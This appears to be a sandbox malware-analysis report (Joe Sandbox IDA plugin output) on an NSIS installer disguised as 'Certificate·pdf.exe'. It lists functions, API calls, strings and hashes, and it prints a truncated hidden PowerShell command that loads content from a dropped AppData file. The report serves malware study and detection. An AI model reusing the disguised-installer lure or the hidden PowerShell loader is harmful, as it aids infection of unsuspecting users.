GetDlgItem.USER32(?,00000003), ref: 00403FC3
ShowWindow.USER32(00000000,?), ref: 00403FE4
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
EnableWindow.USER32(?,?), ref: 00404011
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
EnableMenuItem.USER32(00000000), ref: 0040402E
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
SetWindowTextW.USER32(?,007A1F20), ref: 00404097
ShowWindow.USER32(?,0000000A), ref: 004041CB

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

Function 00403987 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E

lstrcatW.KERNEL32(1033,007A1F20), ref: 00403A08
lstrlenW.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Skamflelsens\fameless,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
lstrcmpiW.KERNEL32(?,.exe,Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Skamflelsens\fameless,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
GetFileAttributesW.KERNEL32(Execute: ), ref: 00403AA6
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Skamflelsens\fameless), ref: 00403AEF

Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB

RegisterClassW.USER32(007A79C0), ref: 00403B2C
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
ShowWindow.USER32(00000005,00000000), ref: 00403BAF
GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
RegisterClassW.USER32(007A79C0), ref: 00403BF1
DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 004039BB
RichEdit, xrefs: 00403BE2
RichEd32, xrefs: 00403BC3
.DEFAULT\Control Panel\International, xrefs: 004039F3
.exe, xrefs: 00403A95
RichEdit20W, xrefs: 00403BD3, 00403BD9
C:\Users\user\AppData\Local\Temp\, xrefs: 00403993
Execute: , xrefs: 00403A4F, 00403A58, 00403A66, 00403AB5, 00403ABB
C:\Users\user\AppData\Local\Skamflelsens\fameless, xrefs: 00403A17, 00403A1F, 00403AC2, 00403AC8, 00403AD8
RichEd20, xrefs: 00403BB5
"C:\Users\user\Desktop\Certificate#U00b7pdf.exe", xrefs: 0040398B
_Nb, xrefs: 00403B0B, 00403B73
1033, xrefs: 004039A7, 00403A03

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Skamflelsens\fameless$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Execute: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3002412207
Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(007B6800,00402F1D,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

Inst, xrefs: 00402FC2
C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
Null, xrefs: 00402FD4
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
vy, xrefs: 00402F6B
"C:\Users\user\Desktop\Certificate#U00b7pdf.exe", xrefs: 00402EDD
soft, xrefs: 00402FCB
Error launching installer, xrefs: 00402F2D

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
API String ID: 4283519449-1224506812
Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

Function 004062B9 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Execute: ,00000400), ref: 004063FA
GetWindowsDirectoryW.KERNEL32(Execute: ,00000400,00000000,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,?,00405336,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000), ref: 0040640D
SHGetSpecialFolderLocation.SHELL32(00405336,00790DA9,00000000,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,?,00405336,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000), ref: 00406449
SHGetPathFromIDListW.SHELL32(00790DA9,Execute: ), ref: 00406457
CoTaskMemFree.OLE32(00790DA9), ref: 00406462
lstrcatW.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
lstrlenW.KERNEL32(Execute: ,00000000,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,?,00405336,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000), ref: 004064E0

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004063CA
Execute: , xrefs: 004062E3, 004063BE, 004063C5, 004063C9, 004063E3, 004063E4, 004063F9, 0040640C, 00406428, 00406453, 00406487, 0040648D, 004064A9, 004064BC, 004064D9, 004064DF, 004064EB, 0040651E
Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il, xrefs: 004062DE
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406482

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Execute: $Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1081890849
Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\,powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\,00000000,00000000,powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\,C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens,?,?,00000031), ref: 004017D5

Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4

Part of subcall function 004052FF: lstrlenW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
Part of subcall function 004052FF: lstrcatW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00403257), ref: 0040535A
Part of subcall function 004052FF: SetWindowTextW.USER32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il), ref: 0040536C
Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA

Strings

C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens, xrefs: 0040179E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove, xrefs: 00401835, 00401851
powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove$C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens$powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\
API String ID: 1941528284-3484373495
Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

Function 004052FF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
lstrlenW.KERNEL32(00403257,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
lstrcatW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00403257), ref: 0040535A
SetWindowTextW.USER32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il), ref: 0040536C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA

Strings

Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il, xrefs: 00405320, 00405330, 00405336, 00405359, 00405365

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il
API String ID: 2531174081-2389797844
Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98

Function 00406601 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
wsprintfW.USER32 ref: 00406653
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406667

Strings

UXTHEME, xrefs: 0040660A
\, xrefs: 00406629
%s%S.dll, xrefs: 0040664D

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403180
GetTickCount.KERNEL32 ref: 00403204
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 0040322D
wsprintfW.USER32 ref: 00403240

Strings

... %d%%, xrefs: 0040323A

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
